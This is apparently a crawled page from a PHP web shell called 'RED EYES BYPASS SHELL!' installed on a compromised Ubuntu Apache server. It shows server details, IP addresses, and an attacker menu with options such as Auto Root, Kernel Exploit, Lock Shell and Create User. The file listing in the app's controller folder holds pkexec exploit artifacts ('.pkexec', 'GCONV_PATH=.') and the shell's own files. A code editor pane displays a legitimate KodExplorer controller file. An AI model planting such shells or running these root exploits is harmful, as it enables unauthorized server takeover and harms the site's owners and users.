Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
iqtd /
vendor /
admin /
app /
controller /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.red_eyes_root
0
B
-rw-r--r--
api.class.php
1.35
KB
-rwxr-xr-x
app.class.php
3.3
KB
-rwxr-xr-x
desktop.class.php
926
B
-rwxr-xr-x
editor.class.php
4.57
KB
-rwxr-xr-x
explorer.class.php
45.71
KB
-rwxr-xr-x
fav.class.php
1.77
KB
-rwxr-xr-x
pluginApp.class.php
6.01
KB
-rwxr-xr-x
redeyes
10.99
KB
-rwxr-xr-x
setting.class.php
3.76
KB
-rwxr-xr-x
share.class.php
20.3
KB
-rwxr-xr-x
systemGroup.class.php
8.58
KB
-rwxr-xr-x
systemMember.class.php
16.05
KB
-rwxr-xr-x
systemRole.class.php
4.85
KB
-rwxr-xr-x
user.class.php
21.61
KB
-rwxr-xr-x
userShare.class.php
3.17
KB
-rwxr-xr-x
utils.php
17.56
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : desktop.class.php
<?php /* * @link http://kodcloud.com/ * @author warlee | e-mail:kodcloud@qq.com * @copyright warlee 2014.(Shanghai)Co.,Ltd * @license http://kodcloud.com/tools/license/license.txt */ class desktop extends Controller{ function __construct() { parent::__construct(); } public function index() { $wap = is_wap() && (!isset($_COOKIE['forceWap']) || $_COOKIE['forceWap'] == '1'); $desktopApps = include(DATA_PATH.'system/desktop_app.php'); $wall = $this->config['user']['wall']; if( !strstr($wall,'/') ){ $wall = STATIC_PATH.'images/wall_page/'.$wall.'.jpg'; } $wall = str_replace('&','&',$wall); $desktop = iconv_system(HOME.DESKTOP_FOLDER.'/'); if($GLOBALS['isRoot'] == 1){ $desktop = iconv_system(MYHOME.DESKTOP_FOLDER.'/'); } mk_dir($desktop); $this->assign('wall',$wall); $this->assign('desktopApps',$desktopApps); $this->display('index.html'); } }
Close